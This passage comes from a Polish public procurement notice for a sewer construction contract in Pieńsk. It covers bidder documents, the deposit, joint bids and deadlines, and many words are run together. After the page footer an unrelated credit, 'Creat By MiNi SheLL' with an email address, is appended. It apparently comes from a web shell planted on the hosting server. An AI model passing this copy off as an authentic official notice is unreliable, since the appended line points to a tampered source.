lub<br/>miejscezamieszkania ma osoba, którejdokument dotyczy, nie wydaje się dokumentów, o którychmowa<br/>w pkt IX.4. ppkt.5, zastępuje się jeodpowiednio w całości lub w części dokumentemzawierającym<br/>odpowiednio oświadczenie wykonawcy,ze wskazaniem osoby albo osóbuprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, którejdokument miałdotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibęlubmiejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przedorganemsądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowegolub gospodarczego,właściwym ze względu na siedzibę lub miejsce<br/>zamieszkaniawykonawcy. Dokumenty powinny byćwystawione nie wcześniej niż 3 miesięcy<br/>przedupływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający, że wykonawca jest ubezpieczony<br/>ododpowiedzialności cywilnejw zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówieniana sumęgwarancyjną nie mniejszą niż 150 000,00 zł (słownie złotych: sto pięćdziesiąt tysięcy 00/100).<br/>2.Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeliokresprowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju,wartości,<br/>daty imiejsca wykonania oraz podmiotów, na rzecz których roboty te zostaływykonane, oraz<br/>załączeniemdowodów określających,czy te roboty budowlane zostaływykonane należycie, przy czym<br/>dowodami, októrych mowa, są referencje bądź innedokumenty sporządzone przez podmiot, na rzecz którego robotybudowlane zostaływykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest wstanieuzyskaćtych dokumentów – inne odpowiednie dokumenty.3. Wykazu osób, skierowanych<br/>przezwykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za<br/>świadczenieusług, kontrolę jakości lub kierowanierobotami budowlanymi, wraz z informacjami na temat<br/>ichkwalifikacji zawodowych,uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonaniazamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacjąopodstawie do dysponowania tymi osobami.4. Dokumentów dotyczących podmiotu<br/>trzeciego, w celuwykazania spełnienia, w zakresie,w jakim Wykonawca powołuje się na jego<br/>zasoby,warunków udziałuw postępowaniu jeżeliwykonawca polega na zasobach podmiotu trzeciego.<br/>Jeżeli z<br/>uzasadnionejprzyczynywykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowychśrodkówdowodowych, wykonawca składa inne podmiotowe środki dowodowe, którew<br/>wystarczającysposób potwierdzają spełnianie opisanego przez zamawiającego warunkuudziału w<br/>postępowaniu lubkryterium selekcji dotyczącego sytuacji ekonomicznej lubfinansowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony f o r m u l a r z o f e r t y – załącznik do siwz2) Wykonawca dołącza<br/>doofertyoświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>wpostępowaniu wzakresie wskazanym w SWZ. Oświadczenie to stanowi dowód<br/>potwierdzającybrak podstawwykluczenia oraz spełnianie warunków udziału w postępowaniu, na<br/>dzieńskładaniaofert,tymczasowo zastępujący wymagane podmiotowe środki dowodowe,<br/>wskazanewSWZ.3)Oryginał pełnomocnictwa do działania w imieniu wykonawcy lub<br/>notarialniepotwierdzonyodpis pełnomocnictwa, w przypadku, gdy wykonawcę reprezentuje<br/>Pełnomocnik oile prawo dopodpisania oferty nie wynika z dokumentów, do których Zamawiający<br/>ma dostępbądź z innychdokumentów dołączonych do oferty. Treść pełnomocnictwa<br/>musijednoznacznie określaćczynności, co do wykonywania których pełnomocnik jest<br/>upoważniony. 4)Dowód wniesienia w adi u m z dopiskiem zawierającym oznaczenie<br/>postępowania oraz zokreśleniem sposobu zwrotuwadium;5) Pisemne zobowiązanie innych<br/>podmiotów do oddania wykonawcy do dyspozycjiniezbędnych zasobów na potrzeby wykonania<br/>zamówienia - jeżeliwykonawca,zgodnie z art.125ust. 5 ustawy, polega na zdolnościach lub<br/>sytuacji innychpodmiotów, niezależnie od charakteruprawnego łączących go z nimi stosunków, o<br/>czym mowa wpunktach IX.6.1) – 7).6)W przypadkuwykonawców ubiegających się wspólnie o<br/>udzieleniezamówienia wykonawcy zobowiązani są doustanowienia pełnomocnika.<br/>Dokumentpełnomocnictwa, z którego treści będzie wynikałoumocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawcównależy załączyć<br/>dooferty.Pełnomocnictwo powinno być załączone do oferty i powinno zawieraćw<br/>szczególnościwskazanie:- postępowania o zamówienie publiczne, którego dotyczy,-wszystkich<br/>wykonawcówubiegających się wspólnie o udzielenie zamówienia wymienionych znazwy z<br/>określeniem adresusiedziby,- ustanowionego pełnomocnika oraz zakresu jegoumocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 2 600,00 zł (słownie złotych: dwa tysiące sześćset 00/100).<br/> 2. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/> 3. Wadium musi obejmować pełen okres związania ofertą.<br/> 4. Wadium musi być wniesione przed upływem terminu składania ofert.<br/> Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy: Bank Spółdzielczy w Pieńsku 60 8382 0001 0000 0202 2000 0060, z oznaczeniem: tryb podstawowy na zadanie pn: „Budowa kanalizacji sanitarnej w ul. Spacerowej w Pieńsku”. Wadium musi być na koncie Zamawiającego przed upływem terminu składania ofert.<br/> 5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/> 1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/>w gwarancji lub poręczeniu musi być Gmina Pieńsk,<br/> 2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/> 3) kwotę gwarancji/poręczenia,<br/> 4) termin ważności gwarancji/poręczenia,<br/> 5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/> 6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/> 7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/> 8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim<br/>przypadkuwykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniuo<br/>udzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy wsprawie<br/>zamówieniapublicznego. Do oferty należy załączyć pełnomocnictwo podpisaneprzez<br/>upoważnionychprzedstawicieli wszystkich pozostałych wykonawców w formie oryginału lubkopii<br/>poświadczonejza zgodność z oryginałem przez notariusza. Złożona oferta musi byćpodpisana w<br/>taki sposób,byprawnie zobowiązywała wszystkich wykonawców<br/>występującychwspólnie.Pełnomocnictwoskłada się w oryginale lub kopii poświadczonej<br/>notarialnie.2. Wodniesieniu do wymagańpostawionych przez Zamawiającego, każdy z<br/>wykonawcówwystępujących wspólnie musiudokumentować, że nie podlega wykluczeniu na<br/>podstawie art. 108ust. 1 i 2 oraz 109ust.1pkt.4,5,7-10 ustawy. Warunki udziału w postępowaniu<br/>określone w art. 112 ust. 2 pkt 2-3ustawyPZP (pkt VII SIWZ) musi spełniać co najmniej jeden<br/>wykonawcasamodzielnie lubwszyscy wykonawcy łącznie. 3. Wszelka korespondencja oraz<br/>rozliczeniadokonywane będąwyłącznie z pełnomocnikiem.4. Wykonawcy wspólnie ubiegający<br/>się oudzielenie zamówieniapublicznego ponoszą solidarną odpowiedzialność za wykonanie<br/>umowyoraz za szkody powstałez tytułu czynów niedozwolonych.5. Jeżeli oferta Wykonawców<br/>wspólnieubiegających się oudzielenie zamówienia, zostanie wybrana jako najkorzystniejsza,<br/>Zamawiającyzobowiązujewykonawców przed zawarciem umowy w sprawie zamówienia<br/>publicznego, doprzedłożeniaumowy regulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami §14. 1 projektu umowy który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP https://epuap.gov.pl/wps/portal iudostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-02 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> nie dotyczt</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com